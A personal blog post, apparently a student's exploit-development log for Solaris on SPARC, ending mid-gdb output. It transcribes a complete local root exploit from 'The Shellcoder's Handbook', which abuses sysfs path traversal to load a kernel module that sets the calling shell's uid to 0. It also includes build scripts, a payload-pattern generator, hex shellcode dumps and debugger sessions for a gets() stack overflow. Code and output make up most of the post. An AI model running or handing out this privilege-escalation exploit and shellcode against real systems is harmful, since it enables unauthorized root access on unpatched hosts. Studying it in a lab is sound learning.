Woo-Hoo. I’m finally ready to release source code :D
Woo-Hoo. I’m finally ready to release source code :D
“The Shellcoder’s Handbook” comes supplied with a ready exploit against http://www.securitytracker.com/id/1008833
But, it has some problems. the kernel module compiling script is broken (needs -c flag), else it will bitch about _init and _fini being defined twice.. This script uses the Sun Studio (11) cc compiler, but gcc can be used too (untested). https://www.thc.org/papers/slkm-1.0.html suggests
gcc -D_KERNEL -DSVR4 -DSOL2 -O2 -c flkm.c ld -o flkm -r flkm.o
To test this exploit (which I did successfully, yes this code works as is), I had to back down my patches on my Solaris box.. There is not automatic tool to uninstall patch dependencies.. So I built my own:
#include <stdio.h> #include <strings.h> #include <unistd.h> char logtime_str[8192]; char mycmd[1024]; char deeplist[8192][25]; int curcount=0; char *doit(char *cmd) { FILE *fp; int status; char *str; /* Open the command for reading. */ fp = popen(cmd, "r"); if (fp == NULL) { printf("Failed to run command\n" ); return NULL; } /* Read the output a line at a time - output it. */ while (fgets(logtime_str, sizeof(logtime_str)-1, fp) != NULL) { //logtime_str[strlen(logtime_str)-1]=0; // take out \n printf("%s", logtime_str); if ( (str=strstr(logtime_str, "required to be installed by patch ")) ) { strcpy(deeplist[curcount++], cmd); str+=strlen("required to be installed by patch "); str[9]=0; //sprintf () return str; } } return NULL; } int main(int argc, char **argv) { if (argc != 2) exit(1); printf ("Removing Patch %s", argv[1]); sprintf(mycmd, "patchrm %s" , argv[1]); //108528-29"); while (1) { char *newstr; if ( (newstr=doit(mycmd)) ) { sprintf(mycmd, "patchrm %s", newstr); printf ("%s\n", mycmd); printf ("Removing Patch %s", mycmd); } else { if (curcount) { strcpy ( mycmd, deeplist[--curcount] ); bzero (deeplist[curcount], 25); } else break; } } return 0; }
in my case, I needed to uninstall 108528-29, and there were a lot of nested dependencies involved, ALL having to be uninstalled manually without this tool above.. So now I just do:
./a.out 108528-29
And BAM.. auto uninstall..
WARNING: Back-pedaling thru patches is dangerous!! My SSHD doesn’t work correctly now :[ So now I’m reinstalling the patch cluster x.x
Now, the source code to the exploit… Since this source code was not found anywhere, I had to transcribe it all myself…
o0o0.c
#include <stdio.h> #include <sys/fstyp.h> #include <sys/fsid.h> #include <sys/systeminfo.h> /* int sysfs(int opcode, const char *fsname); */ int main(int argc, char **argv) { char modname[] = "../../../tmp/o0"; char buf[4096]; char ver[32], *ptr; int sixtyfour = 0; memset((char *) buf, 0x00, 4096); if (sysinfo(SI_ISALIST, (char *) buf, 4095) < 0) { perror("sysinfo"); exit (0); } if (strstr(buf, "sparcv9")) sixtyfour = 1; memset( (char *) ver, 0x00, 32); if (sysinfo(SI_RELEASE, (char *) ver, 32) < 0) { perror("sysinfo"); exit (0); } ptr = (char *) strstr(ver, "."); if (!ptr) { fprintf(stderr, "can't grab release version!\n"); exit (0); } ptr++; printf ("%s\n",ptr); //return 0; memset((char *) buf, 0x00, 4096); if (sixtyfour) snprintf(buf, sizeof(buf)-1, "cp ./o064 /tmp/sparcv9/o0"/*, ptr*/); else snprintf(buf, sizeof(buf)-1, "cp ./o032 /tmp/o0"/*, ptr*/); if (sixtyfour) { if (mkdir("/tmp/sparcv9", 0755) < 0) { perror ("mkdir"); exit(0); } } system(buf); sysfs(GETFSIND, modname); if (sixtyfour) system("/usr/bin/rm -rf /tmp/sparcv9"); else system("/usr/bin/rm -f /tmp/o0"); }
moka.c
#include <sys/systm.h> #include <sys/ddi.h> #include <sys/sunddi.h> #include <sys/cred.h> #include <sys/types.h> #include <sys/proc.h> #include <sys/procfs.h> #include <sys/kmem.h> #include <sys/errno.h> #include <fcntl.h> #include <unistd.h> #include <sys/modctl.h> extern struct mod_ops mod_miscops; int g3mm3(void); int g3mm3() { register proc_t *p; register proc_t *pp; cred_t *cr, *newcr; mutex_enter(&pidlock); for (p=practive; p!=NULL; p = p->p_next) { if (strstr(p->p_user.u_comm, (char *) "o0o0")) { pp = p->p_parent; newcr = crget(); mutex_enter(&pp->p_crlock); cr = pp->p_cred; crcopy_to(cr,newcr); pp->p_cred = newcr; newcr->cr_uid = 0; mutex_exit(&pp->p_crlock); } continue; } mutex_exit(&pidlock); return 1; } static struct modlmisc modlmisc = { &mod_miscops, "u_comm" }; static struct modlinkage modlinkage = { MODREV_1, (void *) &modlmisc, NULL }; int _init(void) { int i; if ((i = mod_install(&modlinkage)) != 0) //cmn_err(CE_NOTE, ""); ; #ifdef _DEBUG else cmn_err(CE_NOTE, "o0o0o0o0 installed o0o0o0o0"); #endif i = g3mm3(); return i; } int _info(struct modinfo *modinfop) { return (mod_info(&modlinkage, modinfop)); } int _fini(void) { int i; if ((i = mod_remove(&modlinkage)) != 0) //cmn_err (CE_NOTE, "not removed"); ; #ifdef _DEBUG else cmn_err(CE_NOTE, "removed"); #endif return i; }
make_64.sh
/opt/SUNWspro/bin/cc -xCC -g -xregs=no%appl,no%float -xarch=v9 -DUSE_KERNEL_UTILS -D_KERNEL -D_B64 -c moka.c ld -o moka -r moka.o rm moka.o mv moka o064 gcc -o o0o0 o0o0.c /usr/ccs/bin/strip o0o0 o064
Note: There were inconsistencies with the source code that I took care of.. Apparently the writers of the Shellcoder’s Handbook didn’t give 2 fucks about this one…
Now let’s start perfecting our exploit:
STACK RANGE 0xFFBEE000 . . 0xFFBEE800 . . 0xFFBEF000 . . 0xFFBEF800 . 0xFFBF0000
The above is the typical Stack range for a 32-bit sparc app in 64-bit kernel. That’s as specific as I care for.. We can create a guesser program to, based on nop-sled size, slice the bitspace into potential landing pads and call the vulnerable program for each landing pad until success.
Thus, this program will have the payload and be able to modify it as it goes.
given this line:
./build_shellcode_steps asmshell5_interactive.bin; ./alternating_payload3 338 >> payload; printf "\x41\x0a" >> payload
I have 338 bytes of nop slide goodness, 0x152. 8192 / 338 = 24.2 = 24. We can break the stack space into 24 chunks of potential zones where one of them will successfully execute the exploit. I’m assuming I have that many chances anyways..
Writing the automated Stack Shocker
Let me categorize our buffer:
[11111111111][fp][ra][2222222222222222222]
11111 and fp unchanged. ra is changed and 22222 is unchanged
I begin crafting my program.
-bash-4.3$ od -t x1 -A n payload 01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44 01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48 01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c 01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50 01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54 01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58 01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42 02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46 02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a 02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e 02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52 02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56 02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a 03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44 03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48 03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c 03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50 03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54 03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58 03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42 04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50 11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60 90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d 82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01 91 d0 20 08 0a -bash-4.3$ od -t x1 -A n payload | sed 's/ //g' 01 41 41 41 01 42 42 42 01 43 43 43 01 44 44 44 01 45 45 45 01 46 46 46 01 47 47 47 01 48 48 48 01 49 49 49 01 4a 4a 4a 01 4b 4b 4b 01 4c 4c 4c 01 4d 4d 4d 01 4e 4e 4e 01 4f 4f 4f 01 50 50 50 01 51 51 51 01 52 52 52 01 53 53 53 01 54 54 54 01 55 55 55 01 56 56 56 01 57 57 57 01 58 58 58 01 59 59 59 01 5a 5a 5a 02 41 41 41 02 42 42 42 02 43 43 43 02 44 44 44 02 45 45 45 02 46 46 46 02 47 47 47 02 48 48 48 02 49 49 49 02 4a 4a 4a 02 4b 4b 4b 02 4c 4c 4c 02 4d 4d 4d 02 4e 4e 4e 02 4f 4f 4f 02 50 50 50 02 51 51 51 02 52 52 52 02 53 53 53 02 54 54 54 02 55 55 55 02 56 56 56 02 57 57 57 02 58 58 58 02 59 59 59 02 5a 5a 5a 03 41 41 41 03 42 42 42 03 43 43 43 03 44 44 44 03 45 45 45 03 46 46 46 03 47 47 47 03 48 48 48 03 49 49 49 03 4a 4a 4a 03 4b 4b 4b 03 4c 4c 4c 03 4d 4d 4d 03 4e 4e 4e 03 4f 4f 4f 03 50 50 50 03 51 51 51 03 52 52 52 03 53 53 53 03 54 54 54 03 55 55 55 03 56 56 56 03 57 57 57 03 58 58 58 03 59 59 59 03 5a 5a 5a 04 41 41 41 04 42 42 42 04 43 43 43 04 44 44 44 ff be fe 68 ff be fe 50 11 0b d8 9a 90 12 21 6e d0 23 a0 54 11 0b dc da d0 23 a0 58 11 0b 5a 40 d0 23 a0 5c c0 23 a0 60 90 03 a0 54 d0 23 a0 48 90 03 a0 5c d0 23 a0 4c c0 23 a0 50 90 03 a0 54 92 03 a0 48 94 1b 40 0d 82 10 20 3b 91 d0 20 08 90 1b 40 0d 82 10 20 01 91 d0 20 08 0a -bash-4.3$ od -t x1 -A n payload | sed 's/ //g' | sed 's/ /\\x/g' \x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44 \x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48 \x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c \x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50 \x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54 \x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58 \x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42 \x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46 \x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a \x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e \x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52 \x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56 \x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a \x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44 \x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48 \x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c \x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50 \x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54 \x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58 \x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42 \x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50 \x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda \xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60 \x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c \xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d \x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01 \x91\xd0\x20\x08\x0a
further continuing this:
-bash-4.3$ od -t x1 -A n payload | sed 's/ //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g' "\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44" "\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48" "\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c" "\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50" "\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54" "\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58" "\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42" "\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46" "\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a" "\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e" "\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52" "\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56" "\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a" "\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44" "\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48" "\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c" "\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50" "\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54" "\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58" "\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42" "\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50" "\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda" "\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60" "\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c" "\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01" "\x91\xd0\x20\x08\x0a" "" -bash-4.3$ od -t x1 -A n payload | sed 's/ //g' | sed 's/ /\\x/g' | sed 's/^/"/g' | sed 's/$/"/g' | sed 's/""//' "\x01\x41\x41\x41\x01\x42\x42\x42\x01\x43\x43\x43\x01\x44\x44\x44" "\x01\x45\x45\x45\x01\x46\x46\x46\x01\x47\x47\x47\x01\x48\x48\x48" "\x01\x49\x49\x49\x01\x4a\x4a\x4a\x01\x4b\x4b\x4b\x01\x4c\x4c\x4c" "\x01\x4d\x4d\x4d\x01\x4e\x4e\x4e\x01\x4f\x4f\x4f\x01\x50\x50\x50" "\x01\x51\x51\x51\x01\x52\x52\x52\x01\x53\x53\x53\x01\x54\x54\x54" "\x01\x55\x55\x55\x01\x56\x56\x56\x01\x57\x57\x57\x01\x58\x58\x58" "\x01\x59\x59\x59\x01\x5a\x5a\x5a\x02\x41\x41\x41\x02\x42\x42\x42" "\x02\x43\x43\x43\x02\x44\x44\x44\x02\x45\x45\x45\x02\x46\x46\x46" "\x02\x47\x47\x47\x02\x48\x48\x48\x02\x49\x49\x49\x02\x4a\x4a\x4a" "\x02\x4b\x4b\x4b\x02\x4c\x4c\x4c\x02\x4d\x4d\x4d\x02\x4e\x4e\x4e" "\x02\x4f\x4f\x4f\x02\x50\x50\x50\x02\x51\x51\x51\x02\x52\x52\x52" "\x02\x53\x53\x53\x02\x54\x54\x54\x02\x55\x55\x55\x02\x56\x56\x56" "\x02\x57\x57\x57\x02\x58\x58\x58\x02\x59\x59\x59\x02\x5a\x5a\x5a" "\x03\x41\x41\x41\x03\x42\x42\x42\x03\x43\x43\x43\x03\x44\x44\x44" "\x03\x45\x45\x45\x03\x46\x46\x46\x03\x47\x47\x47\x03\x48\x48\x48" "\x03\x49\x49\x49\x03\x4a\x4a\x4a\x03\x4b\x4b\x4b\x03\x4c\x4c\x4c" "\x03\x4d\x4d\x4d\x03\x4e\x4e\x4e\x03\x4f\x4f\x4f\x03\x50\x50\x50" "\x03\x51\x51\x51\x03\x52\x52\x52\x03\x53\x53\x53\x03\x54\x54\x54" "\x03\x55\x55\x55\x03\x56\x56\x56\x03\x57\x57\x57\x03\x58\x58\x58" "\x03\x59\x59\x59\x03\x5a\x5a\x5a\x04\x41\x41\x41\x04\x42\x42\x42" "\x04\x43\x43\x43\x04\x44\x44\x44\xff\xbe\xfe\x68\xff\xbe\xfe\x50" "\x11\x0b\xd8\x9a\x90\x12\x21\x6e\xd0\x23\xa0\x54\x11\x0b\xdc\xda" "\xd0\x23\xa0\x58\x11\x0b\x5a\x40\xd0\x23\xa0\x5c\xc0\x23\xa0\x60" "\x90\x03\xa0\x54\xd0\x23\xa0\x48\x90\x03\xa0\x5c\xd0\x23\xa0\x4c" "\xc0\x23\xa0\x50\x90\x03\xa0\x54\x92\x03\xa0\x48\x94\x1b\x40\x0d" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\x40\x0d\x82\x10\x20\x01" "\x91\xd0\x20\x08\x0a"
There is one problem. the payload.. it doesn’t have a nopsled..
each sparc instruction is 4 bytes and must be aligned properly.. word-aligned.
that means I really have 336 bytes to work with, 336/4 = 84 nop instructions.
i need a nop instruction:
# using the previous developed od2sc above.. bazz@life[pts/6][~/latest] printf ".globl main\nmain:\nxor %%g1,%%g1,%%g0\n" > /tmp/nop.S; buildsc /tmp/nop; od2sc /tmp/nop.bin "\x80\x18\x40\x01"
Although this program doesn’t have to be made in C, I am now migrating it to C in anticipation of using it with a raw PTY in the remote exploit later on.. Actually. I just discovered that I can do the following:
bazz@life[pts/6][~/latest] (cat; cat payload cat) dfd dfd AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAABBBCCCDDD���h���P ؚ�!n�#�T ���#�X Z@�#�\�#�`��T�#�H�� �� ��#�P��T��H� dfd dfd bazz@life[pts/6][~/latest]
After interacting with cat.. I can CTRL-D (not ctrl-C), and then the other program will run.. That’s great.. maybe I can make this whole exploit in bash after all… BUT! That wouldn’t allow a raw terminal session experience in the remote shell. Things like signals or CTRL-characters would be interpreted by the local shell in a “cat” session. Thus, I’m going for the C solution. Plus I just tried using expect, holy God, catting a binary string is impossible <_< of course I only spent 5 minutes on it!
I have tools I can do this in seconds on :)
I am running out.. time to call it a night. But before I do:
TO-DO
1) in PTY:
Allocate signals:
1) Sending payload
2) Respawning target process w/ new return address in payload
Add logic:
deallocate signals when the exploit is successful and we are in the shell.
2) Write the NOP-sled adjusting logic in bash. We can Cify it later
TO BE CONTINUED
SO, back to exploiting the userland gets() function.
Vulnerable Test Prog
#include <stdio.h> unsigned long get_sp( void ) { __asm__("or %sp,%sp,%r1"); // %r1 may have to be %i0 in some circumstances?? weirdness.. } void copy( ){ char buf[256]; gets(buf); } int main( ) { unsigned long ret = get_sp(); fprintf (stderr, "sp = 0x%x", ret); copy( ); return 0; }
$ gcc -g v.c -o v
This invoke scripts helps me keep the stack offset the same whether I run the program in GDB or not..
Note: it doesn’t work that well on my Sun Blade 150 but it works well at the school server…
invoke script
#!/bin/bash while getopts "dte:h?" opt ; do case "$opt" in h|\?) printf "usage: %s -e KEY=VALUE prog [args...]\n" $(basename $0) exit 0 ;; t) tty=1 gdb=1 ;; d) gdb=1 ;; e) env=$OPTARG ;; esac done shift $(expr $OPTIND - 1) prog=$(readlink -f $1) shift if [ -n "$gdb" ] ; then if [ -n "$tty" ]; then touch /tmp/gdb-debug-pty exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb -tty /tmp/gdb-debug-pty --args $prog "$@" else exec env - $env TERM=screen PWD=$PWD /usr/local/gnu/bin/gdb --args $prog "$@" fi else exec env - $env TERM=screen PWD=$PWD $prog "$@" fi
I use the invoke script with absolute paths. Here’s an example:
/home/bazz/tools/tmp/latest/invoke2 v < super_payload_lol # or i want to use gdb: /home/bazz/tools/tmp/latest/invoke2 -d v # then from in gdb: # r < super_payload
Interesting note on overflowing a buffer accepted through standard input. Is that the 0x0a byte has the same effect as a null byte. That was not documented anywhere >_< 0x0a is \n iirc, I wonder if \r byte has the same effect (0x0d).. I could try it out but I’m not…
Below is my buffer overflow “marker” program source code. This is documented at https://blogs.umb.edu/michaelbazzinott001/2014/09/25/alternating-payload-automated-offset-calculation-and-identification/
with the shell code assist program, it creates a block of specified length, outputs to stdout.
you are then required to concat any arbitrary data plus the null byte (or, apparently \n)
#include <stdio.h> #include <stdlib.h> // SPARC uses sys/inttypes.h #ifdef __sun #include <sys/inttypes.h> #else #include <stdint.h> #endif // this form provides buffer experimentation foundation // buffer will be created up to numbytes desired, but < MAX, specified // on the command line argument // form: 0x[01-ff][41-5a][41-5a][41-5a] // 0x41-0x5a range is chars 'A' to 'Z' // An extended range < 'A' to > 'Z' could modify this program to extend //the MAX length of the buffer #define CHAR_RANGE (('Z'-'A')+1) // 'Z' - 'A' is 25, but I know // there are 26 letters in the alphabet. I call this inclusive subtraction, // when I add 1 to get the real desired value. There is also inclusive // addition I think. I'm using terms I created. // little proof program to figure this out /* #include // Conclusion: Inclusive Subtraction requires add 1 int main() { printf("Derp Face, I'm ready :) \n"); printf("'Z' - 'A' = %d", ('Z'-'A')+1); return 0; } */ #define MAX (CHAR_RANGE * 255 * 4) // Arbitrary MAX that is derived from the following formula: // 26a * 255b * 4c // a [letters of the alphabet] // b [ byte field width excluding 0 (null byte)] // c [ 4 bytes per entry ie. 0x01414141 ] #define RANGE (26*4) // does the following operation to get the offset: // [(msb - 1) * 26] + (lsb - 0x41) unsigned long getSmashOffset(const unsigned long *smashval) { uint8_t msb,lsb; msb = ( *smashval >> 24 ) & 0xff; lsb = *smashval & 0xff; msb--; msb *= 26; lsb -= 0x41; return msb+lsb; } int main(int argc, char **argv) { char a=0x41; char c=1; int i, rc=0; if (argc != 2) { printf ("You're doing it wrong! \n"); printf ("Usage: %s [numbytes <= %d]|[smashed-stack-val]\n", argv[0], MAX); exit (1); } unsigned long arg, numbytes,smashval; arg = numbytes = strtoul( argv[1], (void *)0, 0 ); if (arg > MAX) { if (arg < 0x01414141) { printf ("You can't have an overflow amount > %d\n", MAX); exit(2); } else { printf ("%lu\n", getSmashOffset(&arg)); return 0; } } int tag; for (a=0x40,i=0,c=1,tag=1; i < (numbytes); i++) { // if (!rc) if (i%4 == 0) { tag = !tag; printf("%c", c); //if (tag == 1) //{ a++; if (a == 'Z'+1) a = 0x41; //} } else printf("%c",a); // else printf("%c%c%c%c", a,a,a,a); rc ++; //+= 4; if (rc == RANGE) { rc=0; c++; if (!c) c++; } } //printf("%c",'\0'); return 0; }
Check it out, here’s a stupid program that uses the write syscall to write some text “Hello” to stdout.
write_raw.S
bazz@blade72[pts/3][~/nobackup/fun] cat write_raw.S .globl main main: ! %o1 must point to the string! let's store the string on the stack set 0x48656c6c, %o0 !"Hell" st %o0, [%sp+84] set 0x6f0a0000, %o0 ! "o\n" st %o0, [%sp+88] add %sp, 84, %o1 mov 1, %o0 mov 7, %o2 mov 4, %g1 ta 8 ! addition to prevent illegal instruction failure mov 1, %g1 ! move 1(exit() syscall) into %g1 mov 0, %o0 ! move 0(return address) into %o0 ta 8 ! call the kernel bazz@blade72[pts/3][~/nobackup/fun] gcc write_raw.S -o /tmp/write_ex bazz@blade72[pts/3][~/nobackup/fun] /tmp/write_ex Hello bazz@blade72[pts/3][~/nobackup/fun
This gets transformed to shellcode like this:
bazz@blade72[pts/3][~/nobackup/fun/asmshell] declare -f buildsc buildsc () { if [ "$1" = "" ]; then echo 'buildsc filename no extension'; return 1; fi; as $1.S -o $1.o; objcopy -O binary $1.o $1.bin }
An alternative to objcopy, also sparcv9 how to:
bazz@vm72[pts/3][~/tools/tmp] cat asmtobin.sh as -Av9 $1.S -o $1.o ld $1.o -o $1.bin --oformat=binary bazz@vm72[pts/3][~/tools/tmp]
bazz@blade72[pts/3][~/nobackup/fun] buildsc write_raw bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw. write_raw.S write_raw.bin write_raw.o bazz@blade72[pts/3][~/nobackup/fun] od -X -A x write_raw.bin 000000 1112195b 9012206c d023a054 111bc280 000010 d023a058 9203a054 90102001 94102007 000020 82102004 91d02008 82102001 90102000 000030 91d02008 000034
Then, to correctly put out a buffer, this knowledge comes from experimenting and debugging the target binary..
bazz@blade72[pts/1][~/tools/tmp/latest] cat build_shellcode_steps ./alternating_payload3 328 # payload size to arrive at %fp and %i7 # fp which becomes the $sp I use during our infected run. These vals # were obtained from live debugging and a better final adaptive method should be used # at production level. # orig val: ffbefe78 printf "\xff\xbe\xfd\x78" # return address: # original val: ffbefe78 printf "\xff\xbe\xfe\xf8" #printf "\xff\xbe\xfe\x38" >> payload # orig val: 0x40 # experimented displacing the payload farther "up" the stack perl -e 'print "A"x0xc0' cat $1 # payload bin file printf "\x00"
bazz@blade72[pts/1][~/tools/tmp/latest] ./build_shellcode_steps write_raw.bin > payload bazz@blade72[pts/1][~/tools/tmp/latest] $PWD/invoke2 -d v GNU gdb 5.3 Copyright 2002 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "sparc-sun-solaris2.7"... (gdb) list 0 1 #include 2 unsigned long get_sp( void ) { 3 __asm__("or %sp,%sp,%r1"); 4 } 5 6 void copy( ){ 7 char buf[256]; 8 9 gets(buf); 10 } (gdb) 11 12 int main( ) { 13 unsigned long ret = get_sp(); 14 fprintf (stderr, "sp = 0x%x\n", ret); 15 copy( ); 16 return 0; 17 } (gdb) b 16 Breakpoint 1 at 0x10790: file v.c, line 16. (gdb) r < payload Starting program: /nobackup/blade74_sd0g/bazz/tmp/latest/v < payload sp = 0xffbefd90 Breakpoint 1, main () at v.c:16 16 return 0; (gdb) # overflow just happened (gdb) x/96x $sp # at this point, this current stack frame's %fp and %i7 are below and are the infected ones # that will be returned upon the next ret restore. # at the top of this printout is a continuation from my marker program, # you can see the pattern. The beginning of the buffer could be looked at by # going lower in memory ie. x/96x $sp-96 or farther down as well.. # but that's not necessary for us. this post is to show how the write syscalls # are about to be executed just fine, but later the execv # syscall just returns and I don't get a shell for some reason. 0xffbefe00: 0x03515151 0x03525252 0x03535353 0x03545454 0xffbefe10: 0x03555555 0x03565656 0x03575757 0x03585858 0xffbefe20: 0x03595959 0x035a5a5a 0x04414141 0x04424242 0xffbefe30: 0x04434343 0x04444444 0xffbefd78 0xffbefef8 0xffbefe40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe70: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe80: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefe90: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefea0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefeb0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefec0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefed0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefee0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefef0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbeff00: 0x1112195b 0x9012206c 0xd023a054 0x111bc280 0xffbeff10: 0xd023a058 0x9203a054 0x90102001 0x94102007 0xffbeff20: 0x82102004 0x91d02008 0x82102001 0x90102000 0xffbeff30: 0x91d02008 0x00002000 0x000007d0 0x00001caf 0xffbeff40: 0x000007d1 0x00001caf 0x000007d2 0x00002801 0xffbeff50: 0x000007d3 0x00002801 0x000007d9 0x00000007 0xffbeff60: 0x00000000 0x00000000 0x2f6e6f62 0x61636b75 ---Type to 